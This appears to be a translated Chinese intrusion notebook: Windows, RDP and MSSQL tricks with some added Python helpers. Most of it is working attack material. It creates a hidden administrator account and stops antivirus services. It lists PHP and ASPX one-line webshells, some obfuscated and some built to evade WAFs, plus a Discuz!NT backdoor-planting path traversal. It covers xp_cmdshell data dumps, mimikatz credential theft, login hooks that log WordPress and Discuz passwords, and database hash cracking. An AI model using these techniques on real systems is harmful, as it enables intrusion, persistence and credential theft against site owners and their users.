[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
The PortNumber value, 3389 by default; change it to the port you want, e.g. 6000.

That is all; reboot the system and it takes effect.

Script for watching 3389 remote logins
Save as a bat file
date /t >>D:\sec\TSlog\ts.log
time /t >>D:\sec\TSlog\ts.log
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
start Explorer
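Added example (my own Python, not code from these notes): the two-step "tasklist /svc, then netstat -ano" lookup described under "finding the terminal" above, written as a parser for both outputs, which also does what the bat script above does with find ":3389" but without assuming the port is still 3389: it locates the PID hosting TermService, reads the port that PID listens on, reports if the port has been moved, and lists the remote addresses with established sessions to it. SAMPLE_TASKLIST and SAMPLE_NETSTAT are constructed outputs (the addresses are documentation ranges), not captures from a real host.

```python
import re

# Constructed output of "tasklist /svc" and "netstat -ano" for a host whose
# RDP listener was moved to 20008 (0x4E28), as in item 3 above.
SAMPLE_TASKLIST = """\
Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
svchost.exe                    900 Dnscache, LanmanWorkstation
svchost.exe                   1124 TermService
sqlservr.exe                  1520 MSSQLSERVER
"""

SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       776
  TCP    0.0.0.0:20008          0.0.0.0:0              LISTENING       1124
  TCP    192.168.1.10:20008     203.0.113.7:51234      ESTABLISHED     1124
  TCP    192.168.1.10:20008     198.51.100.22:40001    ESTABLISHED     1124
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING       1520
  UDP    0.0.0.0:500            *:*                                    672
"""

# image name (may contain spaces), PID, comma-separated services or N/A
TASK_RE = re.compile(r"^(?P<image>.+?)\s+(?P<pid>\d+)\s+(?P<services>.+)$")

def parse_tasklist(text):
    """Map PID -> (image name, [service names]) from tasklist /svc output."""
    procs = {}
    for line in text.splitlines():
        m = TASK_RE.match(line.rstrip())
        if not m:
            continue  # header and separator rows have no numeric PID column
        svc = m.group("services").strip()
        services = [] if svc == "N/A" else [s.strip() for s in svc.split(",")]
        procs[int(m.group("pid"))] = (m.group("image").strip(), services)
    return procs

def parse_netstat(text):
    """Parse netstat -ano rows into dicts; UDP rows carry no State column."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue
        if parts[0] == "TCP" and len(parts) == 5:
            proto, local, remote, state, pid = parts
        elif parts[0] == "UDP" and len(parts) == 4:
            proto, local, remote, pid = parts
            state = ""
        else:
            continue
        rows.append({"proto": proto, "local": local, "remote": remote, "state": state, "pid": int(pid)})
    return rows

def port_of(addr):
    """Port of an 'ip:port' or '[ipv6]:port' string."""
    return int(addr.rsplit(":", 1)[1])

def service_listening_ports(procs, rows, service):
    """Ports on which the process(es) hosting `service` are listening."""
    pids = {pid for pid, (_, svcs) in procs.items() if service in svcs}
    return {port_of(r["local"]) for r in rows if r["pid"] in pids and r["state"] == "LISTENING"}

def established_peers(rows, ports):
    """Remote addresses with an ESTABLISHED session to any of `ports`, in order seen."""
    return [r["remote"].rsplit(":", 1)[0]
            for r in rows if r["state"] == "ESTABLISHED" and port_of(r["local"]) in ports]

def check_rdp(tasklist_text, netstat_text, expected_port=3389):
    """Locate the TermService listener, flag a moved port, list who is connected."""
    procs = parse_tasklist(tasklist_text)
    rows = parse_netstat(netstat_text)
    ports = service_listening_ports(procs, rows, "TermService")
    findings = []
    if not ports:
        findings.append("TermService is not listening on any port")
    for p in sorted(ports):
        if p != expected_port:
            findings.append("TermService listens on %d instead of %d (PortNumber was changed)" % (p, expected_port))
    return {"ports": ports, "peers": established_peers(rows, ports), "findings": findings}

if __name__ == "__main__":
    print(check_rdp(SAMPLE_TASKLIST, SAMPLE_NETSTAT))
```

Scheduling this in place of the bat script gives the same date/time/peer log but keeps working after the PortNumber trick above, and a non-empty findings list is itself worth logging.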
mstsc parameters:

Remote Desktop Connection

MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?

<Connection File> -- specifies the name of the .rdp file for the connection.

/v:<server[:port]> -- specifies the terminal server to connect to.

/console -- connects to the console session of the server.

/f -- starts the client in full-screen mode.

/w:<width> -- specifies the width of the remote desktop screen.

/h:<height> -- specifies the height of the remote desktop screen.

/edit -- opens the specified .rdp file for editing.

/migrate -- migrates legacy connection files created with Client Connection Manager
to new .rdp connection files.

mstsc /console connects to session 0, whereas plain mstsc opens another virtual session, which is effectively like a separate logon to the computer. In other words, connecting with the console parameter gets you the desktop shown on the monitor. Give it a try; it comes in handy at times, especially when some software
mstsc /console /v:124.42.126.xxx   gets around the limit on the number of terminal sessions
Enabling 3389 from the command line
net user asp.net aspnet /add
net localgroup Administrators asp.net /add
net localgroup "Remote Desktop Users" asp.net /add
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
sc config rasman start= auto
sc config remoteaccess start= auto
net start rasman
net start remoteaccess

Media
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

control userpasswords2    view the users' passwords
Exporting an Access database directly as a shell; prerequisite: table a exists in the Access database and you know the site's real path.
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
141. When doing MSSQL injection by hand, if you cannot get the data out by a reverse connection or a file write, most people read the records out one at a time, which is exhausting. Here is a single statement that reads out all the data; the two statements are the same as Test 1 and Test 2 given earlier (the STUFF ... FOR XML PATH('') query over sysobjects, and the same query over a dirs table filled by xp_dirtree).
How to shut down McAfee: // needs SYSTEM privileges; use at or psexec -s cmd.exe
You can upload .com files, e.g. nc.com, to get around McAfee's executable restriction;
net stop mcafeeframework
net stop mcshield
net stop mcafeeengineservice
net stop mctaskmanager
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D

VNCDump.zip (4.76 KB)
Online password cracking: http://tools88.com/safe/vnc.php
The VNC password can be obtained directly with vncdump, or by querying the Password value under [HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] from DOS.

exec master..xp_cmdshell 'net user'
Executing commands in MSSQL.
Query for the MSSQL password hashes:
select name,password from master.dbo.sysxlogins

backup log dbName with NO_LOG;
backup log dbName with TRUNCATE_ONLY;
DBCC SHRINKDATABASE(dbName);
Shrinking an MSSQL database

Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
Compresses the file game_db_201107170400.BAK into 1.rar, split into 200M volumes.

backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
Backs up the game database as game.bak at the path D:\WebSites\game.com\UpFileList\game.bak
Discuz!NT 3.5 penetration notes:
(1) Visit <site>/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default (the template editor does not constrain path, so the traversal reaches files outside the template directory; an admin session is required)
(2) Open the rss.aspx file, copy <%@ Page Inherits="Discuz.Web.UI.RssPage" %> to a local backup, then replace it with <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
(3) Save.
(4) The one-line backdoor is then reachable at http://somesite.com.cn/tools/rss.aspx with password pass
d:\rar.exe a -r d:\1.rar d:\website\
Recursively packs the website directory; mind the path to rar.exe.
<?php
$telok = "0${@eval($_POST[xxoo])}";
$username = "123456";
$userpwd = "123456";
$telhao = "123456";
$telinfo = "123456";
?>
PHP one-liner planted into a config file that does not filter its input: because the value lands inside a double-quoted string, the "${...}" interpolation runs eval($_POST[xxoo]) every time the file is included (this "${expr}" string syntax is deprecated as of PHP 8.2).
Dumping the database when the web server and the database server are separate hosts:
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
(net use is run on the database host, so bcp can write the table straight to the web server's share.)
When the target only lets you place a one-line shell and no full webshell fits, the one-liner is still enough for anything, just far less convenient, for example dumping a database. This uses the shell client's expert mode (write the code yourself); the mysql_* functions below were removed in PHP 7, so on newer hosts use mysqli:
ini_set('display_errors', 1);
set_time_limit(0);
error_reporting(E_ALL);
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
mysql_select_db("discuz", $connx) or die("Could not select database: " . mysql_error());
$result = mysql_query("SELECT * FROM members", $connx) or die("Query failed: " . mysql_error());
$i = 0;
$tmp = '';
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
    $i = $i + 1;
    $tmp .= implode("::", $row) . "\n";
    if (!($i % 500)) { // write one file per 500 rows
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user' . intval($i / 500) . '.txt';
        file_put_contents($filename, $tmp);
        $tmp = '';
    }
}
if ($tmp !== '') { // rows left over after the last full block of 500
    file_put_contents('/home/httpd/bbs.xxxxx/forumdata/cache/user' . (intval($i / 500) + 1) . '.txt', $tmp);
}
mysql_free_result($result);

// delete the files once they have been downloaded
ini_set('display_errors', 1);
error_reporting(E_ALL);
$i = 0;
while ($i < 32) {
    $i = $i + 1;
    $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user' . $i . '.txt';
    unlink($filename);
}
httprint: collects server fingerprints (it identifies the web server software, not the operating system)
Scan every port on 192.168.1.100:
nmap -Pn -sT -sV -p0-65535 192.168.1.100
host -t ns www.owasp.org    lists the authoritative name servers, i.e. gathers DNS information
host -l www.owasp.org ns1.secure.net    attempts a zone transfer for owasp.org from that server
Netcraft DNS search: http://searchdns.netcraft.com/?host
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (free registration required)
MSN search: http://search.msn.com syntax: "ip:x.x.x.x" (without the quotes)
Webhosting info: http://whois.webhosting.info/ syntax: http://whois.webhosting.info/x.x.x.x
DNSstuff: http://www.dnsstuff.com/ (several services available)
http://net-square.com/msnpawn/index.shtml (requires installation)
tomDNS: http://www.tomdns.net/ (some services are still private)
SEOlogs.com: http://www.seologs.com/ip-domains.html (reverse IP/domain lookup)
set names gb2312
Importing a database fails with "Data too long for column 'username' at row 1": the connection character set does not handle the Chinese text, so set it before importing.

MySQL password change:
UPDATE mysql.user SET password=PASSWORD("newpass") WHERE user="mysqladmin";
update user set password=PASSWORD('antian365.com') where user='root';
flush privileges;
(The password column became authentication_string in MySQL 5.7 and PASSWORD() was removed in 8.0; there, change passwords with ALTER USER ... IDENTIFIED BY instead.)
Advanced PHP one-line backdoors

Found many advanced PHP one-liners during intrusions; recording them here so they can be found later by keyword. (The forum's word filter printed eval as eval_r in the original post; the real function is eval.)
1.
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
// Caidao (China Chopper) one-liner: preg_replace with the /e modifier evaluates the replacement as PHP; /e was removed in PHP 7
2.
$filename=$_GET['xbid'];
include ($filename);
// dangerous include: whatever file the parameter points to is compiled and run as PHP
3.
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
// copies an uploaded file to any name, i.e. an unrestricted upload
4.
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
// Caidao one-liner, the same as 1 under another variable name
5. include ($uid);
// dangerous include fed through POST
// a one-liner embedded in a gif
6. Typical one-liners
Backdoor code
<?php eval($_POST[sb])?>
Code
<?php @eval($_POST[sb])?>
// error-suppressed variant
Code
<?php assert($_POST[sb]);?>
// run PHP statements with the expert mode of the lanker one-liner client
Code
<?$_POST['sa']($_POST['sb']);?>
Code
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
// the <? short tag needs short_open_tag enabled
Code
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
// with this one, enter the following in the "config" field when setting up the connection in the Caidao client
Code
<O>h=@eval($_POST[c]);</O>
Code
<script language="php">@eval($_POST[sb])</script>
// one-liner that gets past filters on <? (the <script language="php"> tag itself was removed in PHP 7)
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
Detailed usage (old mimikatz 1.x syntax):
1. Go to the tools directory and run psexec \\127.0.0.1 cmd
2. Run mimikatz
3. Run privilege::debug
4. Run inject::process lsass.exe sekurlsa.dll
5. Run @getLogonPasswords
6. The wdigest entry holds the cleartext password
7. Leave with exit; do not just close the window, or the system will crash.
Current mimikatz 2.x does the same in-process with sekurlsa::logonpasswords, and wdigest no longer keeps the cleartext on Windows 8.1/Server 2012 R2 and later (or on older versions with the wdigest hardening update) unless UseLogonCredential is enabled.
http://www.monyer.com/demo/monyerjs/ fairly complete JS decoding site

Automatically check for missing high-risk patches (dumps systeminfo, greps for each KB and prints "Not Installed!" for the absent ones; inside a batch file write %%i instead of %i):
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 KB942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
One-line aspx backdoor that gets past Safedog (it contains no eval/exec keyword for the WAF to match: the assembly arrives in the request body, its length in the cookie, and is loaded and instantiated with the page as argument)
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["yourpassword"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
Logging WordPress login passwords from a webshell
Records WordPress logins from a webshell to make later social engineering easier.
Add the following at line 539 of wp-login.php:
// log password
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
$txt=$txt."\r\n";
if($log_user&&$log_pwd&&$log_ip){
@fwrite(fopen('pwd.txt',"a+"),$txt);
}
The logging code fires when action=login; it can equally go in the default branch of the switch...case statement.
In short, search for case 'login' and insert the code right below it; the captured passwords end up in pwd.txt.
Modifying wp-login.php is not a good approach, though: it is easy to spot. There are other ways; noting this one for the record.
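The one-line shells catalogued above and the password-logging hooks (the wp-login.php snippet above and the uc_client/client.php one further down) share a handful of tell-tale shapes, and the post itself suggests recording them so they can be found by keyword. The scanner below is an added example, not code from the original post or from the Caidao/lanker clients it mentions: it first undoes the two obfuscations used above ("p"."r"."e" concatenation and calling a function through a variable that holds its name) and then matches each catalogued pattern. The sample files are constructed for the example, not taken from any real site.

```python
import re

# Constructed sample files for the scanner: tiny fragments of the kinds
# catalogued above plus one harmless file. None comes from a real site.
SAMPLES = {
    "config.php": r'''<?php $telok = "0${@eval($_POST[xxoo])}"; $username = "123456"; ?>''',
    "cache.php": r'''<?php $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; $hh("/[discuz]/e",$_POST['h'],"Access"); ?>''',
    "inc.php": r'''<?php $filename=$_GET['xbid']; include ($filename); ?>''',
    "up.php": r'''<?php $reg="c"."o"."p"."y"; $reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]); ?>''',
    "a.php": r'''<?php @eval($_POST[sb])?>''',
    "b.php": r'''<?php assert($_POST[sb]);?>''',
    "c.php": r'''<?$_POST['sa']($_POST['sb']);?>''',
    "d.php": r'''<script language="php">@eval($_POST[sb])</script>''',
    "wp-login.php": "case 'login':\n$log_pwd=$_POST['pwd'];\n@fwrite(fopen('pwd.txt',\"a+\"),$txt);\n",
    "clean.php": r'''<?php echo htmlspecialchars($_GET['q']); ?>''',
}

# One regex per catalogued trick; the label is what the report shows.
RULES = [
    ("eval/assert on request data", r'\b(?:eval|assert)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b'),
    ("eval inside string interpolation", r'\$\{\s*@?eval\s*\('),
    ("preg_replace with /e modifier", r'preg_replace\s*\(\s*["\']/[^"\']*/[A-Za-z]*e[A-Za-z]*["\']'),
    ("copy() of an uploaded file", r'\bcopy\s*\(\s*\$_FILES\b'),
    ("include of a variable path", r'\binclude(?:_once)?\s*\(?\s*\$'),
    ("request value called as a function", r'\$_(?:POST|GET|REQUEST|COOKIE)\s*\[[^\]]*\]\s*\('),
    ("<script language=php> tag", r'<script\s+language\s*=\s*["\']php["\']'),
]
# The login hooks are a pair: a password taken from the request plus a file write.
CRED_SOURCE = re.compile(r'\$_POST\s*\[\s*[\'"]?(?:pwd|pass|passwd|password)[\'"]?\s*\]|\$password\b')
FILE_WRITE = re.compile(r'\b(?:fwrite|file_put_contents)\s*\(')


def deobfuscate(src: str) -> str:
    """Undo the two cheap tricks used above to hide a function name from keyword
    scanners: character-by-character concatenation ("p"."r"."e"...) and calling
    through a variable that holds the name ($hh = "preg_replace"; $hh(...))."""
    concat = re.compile(r'(?:"[A-Za-z0-9_]"\s*\.\s*)+"[A-Za-z0-9_]"')
    src = concat.sub(lambda m: '"' + "".join(re.findall(r'"([A-Za-z0-9_])"', m.group(0))) + '"', src)
    for var, name in re.findall(r'\$(\w+)\s*=\s*"([A-Za-z_]\w*)"\s*;', src):
        src = re.sub(r'\$' + re.escape(var) + r'\s*\(', name + '(', src)
    return src


def scan(src: str) -> list:
    """Return the labels of every rule the (deobfuscated) source triggers."""
    code = deobfuscate(src)
    hits = [label for label, pattern in RULES if re.search(pattern, code)]
    if CRED_SOURCE.search(code) and FILE_WRITE.search(code):
        hits.append("credential written to a file")
    return hits


def scan_files(files: dict) -> dict:
    """Map file name -> hits, keeping only files that triggered at least one rule."""
    report = {}
    for name, src in files.items():
        hits = scan(src)
        if hits:
            report[name] = hits
    return report


if __name__ == "__main__":
    for name, hits in scan_files(SAMPLES).items():
        print(f"{name}: {', '.join(hits)}")
```

Run it over a real tree by reading each .php file into the dict passed to scan_files. The deobfuscation step is what separates this from a plain grep: the concatenated-name and variable-function variants above exist precisely to defeat a keyword search for preg_replace or copy, and only resolve to the real call after both rewrites. The variable-include and credential rules are heuristics and will flag some legitimate code, so treat hits as a review list rather than a verdict.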
Using the IIS 6 file-parsing bug to get past Safedog:
;antian365.asp;antian365.jpg
(IIS 6 stops reading the name at the semicolon and handles the file as .asp, while the upload filter sees a .jpg.)
Grabbing hashes from various databases to crack the highest-privilege password
1. SQL Server 2000
SELECT password from master.dbo.sysxlogins where name='sa'
0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A
0x0100 - constant header
34767D5C - salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341 - case sensitive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A - upper case hash
Crack the upper-case hash in Cain & Abel first and then work out the case-sensitive one (both are SHA-1 over the UTF-16LE password followed by the 4-byte salt).
SQL Server 2005:
SELECT password_hash FROM sys.sql_logins where name='sa'
0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0x0100 - constant header
993BF231 - salt
5F36CC441485B35C4D84687DC02C78B0E680411F - case sensitive hash
Crack the case-sensitive hash in Cain; try brute force and dictionary attacks.

Update, following Bernardo's comments:
use the function fn_varbintohexstr() to cast the password to a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password) from sysxlogins

MySQL:
In MySQL you can generate hashes internally using the PASSWORD(), MD5() or SHA1() functions. PASSWORD() is the function used for MySQL's own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. MD5() is available from MySQL version 3.23.2 and SHA1() was added later in 4.0.2.

*mysql < 4.1
mysql> SELECT PASSWORD('mypass');
+--------------------+
| PASSWORD('mypass') |
+--------------------+
| 6f8c114b58f2ce9e   |
+--------------------+

*mysql >= 4.1
mysql> SELECT PASSWORD('mypass');
+-------------------------------------------+
| PASSWORD('mypass')                        |
+-------------------------------------------+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+-------------------------------------------+

Select user, password from mysql.user
The hashes can be cracked in Cain & Abel.

Postgres:
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called "postgres" or "pgsql").
select usename, passwd from pg_shadow;
 usename  | passwd
----------+-------------------------------------
 testuser | md5fabb6d7172aadfda4753bf0507ed4396
Use mdcrack to crack these hashes (the stored value is md5(password + username), hence --append=testuser):
wine MDCrack-sse.exe --algorithm=MD5 --append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:
select name, password, spare4 from sys.user$
The hashes can be cracked with Cain & Abel or thc-orakelcrackert11g (password holds the DES-based 10g hash, spare4 the 11g SHA-1 hash).
More on Oracle later, I am a bit bored....
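To make the format breakdown above concrete, here is an added example (not part of the original post, and not code from Cain or mdcrack) that splits a SQL Server 2000/2005 hash into header, salt and digests, recomputes each of the three stores' hash from a candidate password, and runs a small dictionary pass over them. The SQL Server layouts, the MySQL PASSWORD('mypass') value and the Postgres username-as-salt rule come from the text above; the password "Sa!2013" and the wordlist in the demo are constructed for the example. The pre-4.1 MySQL algorithm is not implemented.

```python
import hashlib


def _unhex(h: str) -> bytes:
    """Accept '0x0100...' or '0100...' in either letter case."""
    h = h.strip()
    if h[:2].lower() == "0x":
        h = h[2:]
    return bytes.fromhex(h)


def mssql_split(hash_hex: str) -> dict:
    """Split a SQL Server 2000 (46 byte) or 2005+ (26 byte) login hash into its
    fixed 0x0100 header, 4-byte salt, case-sensitive SHA-1 and, for 2000 only,
    the SHA-1 of the upper-cased password."""
    raw = _unhex(hash_hex)
    if raw[:2] != b"\x01\x00" or len(raw) not in (26, 46):
        raise ValueError("not a SQL Server 2000/2005 password hash")
    return {"salt": raw[2:6], "case_sensitive": raw[6:26], "upper": raw[26:46] or None}


def mssql_hash(password: str, salt: bytes, legacy: bool) -> str:
    """Recompute the stored value: SHA1(UTF-16LE(password) + salt); the SQL
    Server 2000 layout (legacy=True) appends SHA1 of the upper-cased password."""
    raw = b"\x01\x00" + salt + hashlib.sha1(password.encode("utf-16-le") + salt).digest()
    if legacy:
        raw += hashlib.sha1(password.upper().encode("utf-16-le") + salt).digest()
    return "0x" + raw.hex().upper()


def mssql_check(password: str, hash_hex: str, ignore_case: bool = False) -> bool:
    """Test one candidate. ignore_case uses the 2000-only upper-case digest,
    which is the post's shortcut: crack that copy first, fix the case after."""
    parts = mssql_split(hash_hex)
    if ignore_case:
        if parts["upper"] is None:
            raise ValueError("SQL Server 2005+ hashes carry no case-insensitive digest")
        digest = hashlib.sha1(password.upper().encode("utf-16-le") + parts["salt"]).digest()
        return digest == parts["upper"]
    digest = hashlib.sha1(password.encode("utf-16-le") + parts["salt"]).digest()
    return digest == parts["case_sensitive"]


def mysql41_hash(password: str) -> str:
    """MySQL >= 4.1 PASSWORD(): '*' + SHA1(SHA1(password)) as upper-case hex."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def pg_md5_hash(password: str, username: str) -> str:
    """PostgreSQL pg_shadow value: 'md5' + MD5(password + username). The user
    name is the salt, which is what mdcrack's --append=testuser reproduces."""
    return "md5" + hashlib.md5((password + username).encode()).hexdigest()


def check(candidate: str, stored: str, username: str = "") -> bool:
    """Dispatch on the stored format and test one candidate password."""
    if stored.startswith("*") and len(stored) == 41:
        return mysql41_hash(candidate) == stored.upper()
    if stored.startswith("md5") and len(stored) == 35:
        return pg_md5_hash(candidate, username) == stored.lower()
    if stored.lower().startswith(("0x0100", "0100")):
        return mssql_check(candidate, stored)
    raise ValueError("unrecognised hash format")


def crack(stored: str, wordlist, username: str = ""):
    """Dictionary pass: return the first word that matches, else None."""
    for word in wordlist:
        if check(word, stored, username):
            return word
    return None


if __name__ == "__main__":
    # the SQL Server 2000 hash quoted above splits into salt + two digests
    parts = mssql_split("0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A")
    print(parts["salt"].hex(), parts["upper"] is not None)
    # the PASSWORD('mypass') value from the manual is reproduced by mysql41_hash
    print(crack("*6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4", ["123456", "mypass"]))
    # constructed SQL Server 2000 hash for "Sa!2013": wrong case fails the
    # case-sensitive digest but passes the upper-case one
    h = mssql_hash("Sa!2013", bytes.fromhex("34767d5c"), legacy=True)
    print(mssql_check("SA!2013", h), mssql_check("SA!2013", h, ignore_case=True))
```

Speed is beside the point here; the value is being able to confirm a format assumption (header, salt position, encoding) against a known password before feeding a batch of hashes to a cracker, and to notice that a 2005+ hash offers no case-insensitive shortcut.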
Enabling xp_cmdshell in SQL Server 2005/2008
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
Clearing the SQL Server 2008 client history (the list of servers recently connected to from the management tools, not the server's own logs); back it up before deleting.
For SQL Express 2008 on Windows Server 2008 Standard, delete:
X:\Users\[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
For versions before SQL Server 2008:
SQL Server 2005:
delete X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
SQL Server 2000:
remove the matching entries under HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\ in the registry.
Last edited by simeon on 2013-1-3 09:51
Windows 2008 file permission changes
1. http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2. http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
1. First check whether the right-click menu has a "Take ownership as administrator" entry; if it does not, import the following .reg file:
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@="Take ownership as administrator"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="Take ownership as administrator"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="Take ownership as administrator"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"

Import the .reg file to add the Win7 right-click "Take ownership as administrator" entry.
2. Search C:\Windows for "notepad.exe"; you should find four "notepad.exe" and four "notepad.exe.mui":
(1) the "notepad.exe" in C:\Windows does not need replacing
(2) the "notepad.exe" in C:\Windows\System32 does not need replacing
(3) leave the four "notepad.exe.mui" files alone
(4) the ones to replace are the "notepad.exe" files under C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4 and
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a
To replace them, first take ownership of those two folders, then rename "Notepad2.exe" to "notepad.exe" and copy it into both;
afterwards go back to the desktop, create a new txt file and open it to check that the editor has changed.
Turning off the security policy (UAC) in Windows 2008; the change takes effect after a reboot:
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Modify client.php under the uc_client directory: immediately below
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
insert the code below; it writes csslog.php under the site's ./data/cache/ directory automatically.
You can also drop a view.php into the ipdata directory to read the records; its password is falw.
(The leading <?exit();?> in each record stops the log from being served when the .php file is requested; the X-Forwarded-For and Client-IP headers are client-supplied, so the logged IP can be spoofed, and $HTTP_SERVER_VARS was removed in PHP 5.4.)
if(getenv('HTTP_CLIENT_IP')) {
    $onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
    $onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
    $onlineip = getenv('REMOTE_ADDR');
} else {
    $onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
$showtime=date("Y-m-d H:i:s");
$record="<?exit();?>User:".$username." Password:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
$handle=fopen('./data/cache/csslog.php','a+');
$write=fwrite($handle,$record);